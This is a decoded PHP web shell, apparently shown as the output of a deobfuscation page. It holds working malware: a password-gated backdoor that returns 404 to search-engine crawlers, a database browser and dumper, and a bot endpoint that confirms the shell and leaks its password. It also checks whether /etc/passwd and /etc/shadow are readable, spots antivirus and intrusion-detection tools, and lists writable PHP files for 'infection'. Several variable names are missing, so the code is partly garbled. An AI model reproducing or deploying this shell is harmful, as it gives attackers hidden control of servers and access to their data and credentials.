PHP Decode

<?  		</script>"; if (isset($db) && $db->link) { echo "<br/><table width=100% cellpadding=2 cellspacing=0>"; if (!empty($_POST["sql_base"])) { $db->selectdb($_POST["sql_base"]); echo "<tr><td width=1 style='border-top:2px solid #666;'><span>Tables:</span><br><br>"; $tbls_res = $db->listTables(); while ($ = $db->fetch($tbls_res)) { list($key, $value) = each($); if (!empty($_POST["sql_count"])) { $n = $db->fetch($db->query("SELECT COUNT(*) as n FROM " . $value . '')); } $value = htmlspecialchars($value); echo "<nobr><input type='checkbox' name='tbl[]' value='" . $value . "'>&nbsp;<a href=# onclick="st('" . $value . "',1)">" . $value . "</a>" . (empty($_POST["sql_count"]) ? "&nbsp;" : " <small>({$n["n"]})</small>") . "</nobr><br>"; } echo "<input type='checkbox' onclick='is();'> <input type=submit value='Dump' onclick='document.sf.p2.value="download";document.sf.submit();'><br>File path:<input type=text name=file value='dump.sql'></td><td style='border-top:2px solid #666;'>"; if (@$_POST["p1"] == "select") { $_POST["p1"] = "query"; $_POST["p3"] = $_POST["p3"] ? $_POST["p3"] : 1; $db->query("SELECT COUNT(*) as n FROM " . $_POST["p2"]); $num = $db->fetch(); $pages = ceil($num["n"] / 30); echo "<script>d.sf.onsubmit=function(){st("" . $_POST["p2"] . "", d.sf.p3.value)}</script><span>" . $_POST["p2"] . "</span> ({$num["n"]} records) Page # <input type=text name='p3' value=" . (int) $_POST["p3"] . ">"; echo " of {$pages}"; if ($_POST["p3"] > 1) { echo " <a href=# onclick='st("" . $_POST["p2"] . "", " . ($_POST["p3"] - 1) . ")'>&lt; Prev</a>"; } if ($_POST["p3"] < $pages) { echo " <a href=# onclick='st("" . $_POST["p2"] . "", " . ($_POST["p3"] + 1) . ")'>Next &gt;</a>"; } $_POST["p3"]--; if ($_POST["type"] == "pgsql") { $_POST["p2"] = "SELECT * FROM " . $_POST["p2"] . " LIMIT 30 OFFSET " . $_POST["p3"] * 30; } else { $_POST["p2"] = "SELECT * FROM `" . $_POST["p2"] . "` LIMIT " . $_POST["p3"] * 30 . ",30"; } echo "<br><br>"; } if (@$_POST["p1"] == "query" && !empty($_POST["p2"])) { $db->query(@$_POST["p2"]); if ($db->res !== false) { $title = false; echo "<table width=100% cellspacing=1 cellpadding=2 class=main>"; $line = 1; while ($ = $db->fetch()) { if (!$title) { echo "<tr>"; foreach ($ as $key => $value) { echo "<th>" . $key . "</th>"; } reset($); $title = true; echo "</tr><tr>"; $line = 2; } echo "<tr class="l" . $line . "">"; $line = $line == 1 ? 2 : 1; foreach ($ as $key => $value) { if ($value == null) { echo "<td><i>null</i></td>"; } else { echo "<td>" . nl2br(htmlspecialchars($value)) . "</td>"; } } echo "</tr>"; } echo "</table>"; } else { echo "<div><b>Error:</b> " . htmlspecialchars($db->error()) . "</div>"; } } echo "<br></form><form onsubmit='d.sf.p1.value="query";d.sf.p2.value=this.query.value;document.sf.submit();return false;'><textarea name='query' style='width:100%;height:100px'>"; if (!empty($_POST["p2"]) && $_POST["p1"] != "loadfile") { echo htmlspecialchars($_POST["p2"]); } echo "</textarea><br/><input type=submit value='Execute'>"; echo "</td></tr>"; } echo "</table></form><br/>"; if ($_POST["type"] == "mysql") { $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'"); if ($db->fetch()) { echo "<form onsubmit='d.sf.p1.value="loadfile";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input  class='toolsInp' type=text name=f><input type=submit value='submit'></form>"; } } if (@$_POST["p1"] == "loadfile") { $file = $db->loadFile($_POST["p2"]); echo "<br/><pre class=ml1>" . htmlspecialchars($file["file"]) . "</pre>"; } } else { echo htmlspecialchars($db->error()); } echo "</div>"; hardFooter(); } goto gaWab; z59JV: if (isset($_POST["sts_checker_bot"])) { if ($_POST["sts_checker_bot"] == "checking") { echo "STS.ORIGINAL.SHELL"; die; } elseif ($_POST["sts_checker_bot"] == "getfullinfo") { $unzip = "1"; $mailer = "0"; if (!class_exists("ZipArchive")) { $unzip = "0"; } $rnd = rand(); if (@mail("[email protected]", "Email Sending Test Report ID: " . $rnd, "WORKING!")) { $mailer = "1"; } $the_os = php_uname("s"); $the_host = php_uname("n"); $the_machine_type = php_uname("m"); $the_version = phpversion(); $the_total_disk_space = formatSizeUnits(disk_total_space("/")); echo "STS.VERFIED.SHELL|" . $mailer . "|" . $unzip . "|" . $the_host . "|" . $the_os . "|" . $the_machine_type . "|" . $the_version . "|" . $the_total_disk_space; die; } elseif ($_POST["sts_checker_bot"] == "getpassword") { echo $pw_unhashed; die; } elseif ($_POST["sts_checker_bot"] == "emailcheck") { if (@mail($_POST["sts_checker_bot_email"], "Email sending tester, Item post date: " . $_POST["sts_checker_bot_itemdate"], "Test successful. Please use this 'Item post date' as reference to find that item: " . $_POST["sts_checker_bot_itemdate"])) { echo "true"; } else { echo "false"; } die; } } goto w2JVG; XXrTo: function decrypt($str, $pwd) { $pwd = base64_encode($pwd); $str = base64_decode($str); $enc_chr = ''; $enc_str = ''; $i = 0; while ($i < strlen($str)) { for ($j = 0; $j < strlen($pwd); $j++) { $enc_chr = chr(ord($str[$i]) ^ ord($pwd[$j])); $enc_str .= $enc_chr; $i++; if ($i >= strlen($str)) { break; } } } return base64_decode($enc_str); } goto p2UEO; PnC_E: if (!empty($)) { if (isset($_REQUEST["pass"]) && md5($_REQUEST["pass"]) == $) { prototype(md5($_SERVER["HTTP_HOST"]), $); } if (!isset($_COOKIE[md5($_SERVER["HTTP_HOST"])]) || $_COOKIE[md5($_SERVER["HTTP_HOST"])] != $) { hardLogin(); } } goto Qz4tt; tR9xz: $pw_unhashed = md5(dirname(__FILE__) . $_SERVER["PHP_SELF"] . "!@#$%^&*()_+"); goto ee0Wn; l0Qok: if (!empty($_POST["a"]) && function_exists("action" . $_POST["a"])) { call_user_func("action" . $_POST["a"]); } goto MfY9i; Qz4tt: if (!isset($_COOKIE[md5($_SERVER["HTTP_HOST"]) . "ajax"])) { $_COOKIE[md5($_SERVER["HTTP_HOST"]) . "ajax"] = (bool) $; } goto X14MH; MBmWc: function prototype($k, $v) { $_COOKIE[$k] = $v; setcookie($k, $v); } goto vrXhM; MfY9i: echo "end"; goto OWyZK; OUica: $disable_functions = @ini_get("disable_functions"); goto J_363; vrXhM: function actionSecInfo() { hardHeader(); echo "<h1>Server security information</h1><div class=content>"; function showSecParam($n, $v) { $v = trim($v); if ($v) { echo "<span>" . $n . ": </span>"; if (strpos($v, "\xa") === false) { echo $v . "<br>"; } else { echo "<pre class=ml1>" . $v . "</pre>"; } } } showSecParam("Server software", @getenv("SERVER_SOFTWARE")); if (function_exists("apache_get_modules")) { showSecParam("Loaded Apache modules", implode(", ", apache_get_modules())); } showSecParam("Disabled PHP Functions", $GLOBALS["disable_functions"] ? $GLOBALS["disable_functions"] : "none"); showSecParam("Open base dir", @ini_get("open_basedir")); showSecParam("Safe mode exec dir", @ini_get("safe_mode_exec_dir")); showSecParam("Safe mode include dir", @ini_get("safe_mode_include_dir")); showSecParam("cURL support", function_exists("curl_version") ? "enabled" : "no"); $temp = array(); if (function_exists("mysql_get_client_info")) { $temp[] = "MySql (" . mysql_get_client_info() . ")"; } if (function_exists("mssql_connect")) { $temp[] = "MSSQL"; } if (function_exists("pg_connect")) { $temp[] = "PostgreSQL"; } if (function_exists("oci_connect")) { $temp[] = "Oracle"; } showSecParam("Supported databases", implode(", ", $temp)); echo "<br>"; if ($GLOBALS["os"] == "nix") { showSecParam("Readable /etc/passwd", @is_readable("/etc/passwd") ? "yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a>" : "no"); showSecParam("Readable /etc/shadow", @is_readable("/etc/shadow") ? "yes <a href='#' onclick='g("FilesTools", "/etc/", "shadow")'>[view]</a>" : "no"); showSecParam("OS version", @file_get_contents("/proc/version")); showSecParam("Distr name", @file_get_contents("/etc/issue.net")); if (!$GLOBALS["safe_mode"]) { $userful = array("gcc", "lcc", "cc", "ld", "make", "php", "perl", "python", "ruby", "tar", "gzip", "bzip", "bzip2", "nc", "locate", "suidperl"); $danger = array("kav", "nod32", "bdcored", "uvscan", "sav", "drwebd", "clamd", "rkhunter", "chkrootkit", "iptables", "ipfw", "tripwire", "shieldcc", "portsentry", "snort", "ossec", "lidsadm", "tcplodg", "sxid", "logcheck", "logwatch", "sysmask", "zmbscap", "sawmill", "wormscan", "ninja"); $downloaders = array("wget", "fetch", "lynx", "links", "curl", "get", "lwp-mirror"); echo "<br>"; $temp = array(); foreach ($userful as $) { if (which($)) { $temp[] = $; } } showSecParam("Userful", implode(", ", $temp)); $temp = array(); foreach ($danger as $) { if (which($)) { $temp[] = $; } } showSecParam("Danger", implode(", ", $temp)); $temp = array(); foreach ($downloaders as $) { if (which($)) { $temp[] = $; } } showSecParam("Downloaders", implode(", ", $temp)); echo "<br/>"; showSecParam("HDD space", ex("df -h")); showSecParam("Hosts", @file_get_contents("/etc/hosts")); showSecParam("Mount options", @file_get_contents("/etc/fstab")); } } else { showSecParam("OS Version", ex("ver")); showSecParam("Account Settings", iconv("CP866", "UTF-8", ex("net accounts"))); showSecParam("User Accounts", iconv("CP866", "UTF-8", ex("net user"))); } echo "</div>"; hardFooter(); } goto MQqk2; u4WS6: function actionInfect() { hardHeader(); echo "<h1>Infect</h1><div class=content>"; if ($_POST["p1"] == "infect") { $target = $_SERVER["DOCUMENT_ROOT"]; function ListFiles($dir) { if ($dh = opendir($dir)) { $files = array(); $inner_files = array(); while ($file = readdir($dh)) { if ($file != "." && $file != "..") { if (is_dir($dir . "/" . $file)) { $inner_files = ListFiles($dir . "/" . $file); if (is_array($inner_files)) { $files = array_merge($files, $inner_files); } } else { array_push($files, $dir . "/" . $file); } } } closedir($dh); return $files; } } foreach (ListFiles($target) as $key => $file) { $nFile = substr($file, -4, 4); if ($nFile == ".php") { if ($file != $_SERVER["DOCUMENT_ROOT"] . $_SERVER["PHP_SELF"] && is_writeable($file)) { echo "{$file}<br>"; $i++; } } } echo "<font color=red size=14>{$i}</font>"; } else { echo "<form method=post><input type=submit value=Infect name=infet></form>"; echo "Really want to infect the server?&nbsp;<a href=# onclick="g(null,null,'infect')">Yes</a></div>"; } hardFooter(); } goto G8cmK; H9x18: if (strtolower(substr(PHP_OS, 0, 3)) == "win") { $os = "win"; } else { $os = "nix"; } goto ZuuFx; eAtQG: if (PHP_VERSION_ID < 70000) { @set_magic_quotes_runtime(0); } goto mdCfK; NcQcO: if (!function_exists("posix_getgrgid") && strpos($GLOBALS["disable_functions"], "posix_getgrgid") === false) { function posix_getgrgid($p) { return false; } } goto rc2dt; R2HAO: $ = md5($_SERVER["HTTP_USER_AGENT"]); goto PIzrX; DJcUw: if (!function_exists("posix_getpwuid") && strpos($GLOBALS["disable_functions"], "posix_getpwuid") === false) { function posix_getpwuid($p) { return false; } } goto NcQcO; TQhs6: $ = "FilesMan"; goto R2HAO; PYh2w: if (empty($_POST["a"])) { if (isset($) && function_exists("action" . $)) { $_POST["a"] = $; } else { $_POST["a"] = "FilesMan"; } } goto l0Qok; w2JVG: $ = true; goto TA8hx; dPBlO: @ini_set("max_execution_time", 0); goto Xz07I; W_qyb: function actionLogout() { setcookie(md5($_SERVER["HTTP_HOST"]), '', time() - 3600); die("bye!"); } goto O8Bkq; X14MH: function hardLogin() { if (!empty($_SERVER["HTTP_USER_AGENT"])) { $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler"); if (preg_match("/" . implode("|", $userAgents) . "/i", $_SERVER["HTTP_USER_AGENT"])) { header("HTTP/1.0 404 Not Found"); die; } } die("<pre align=center><form method=post>Password<br><input type=password name=pass style='background-color:whitesmoke;border:1px solid #FFF;outline:none;' required><input type=submit name='watching' value='Login' style='border:none;background-color: #ff0000;color:#fff;cursor:pointer;'></form></pre>"); } goto H9x18; LarW_: $cwd = @getcwd(); goto fqre7; Xz07I: @set_time_limit(0); goto eAtQG; iBn85: function which($p) { $path = ex("which " . $p); if (!empty($path)) { return $path; } return false; } goto fgiAj; OWyZK:  ?>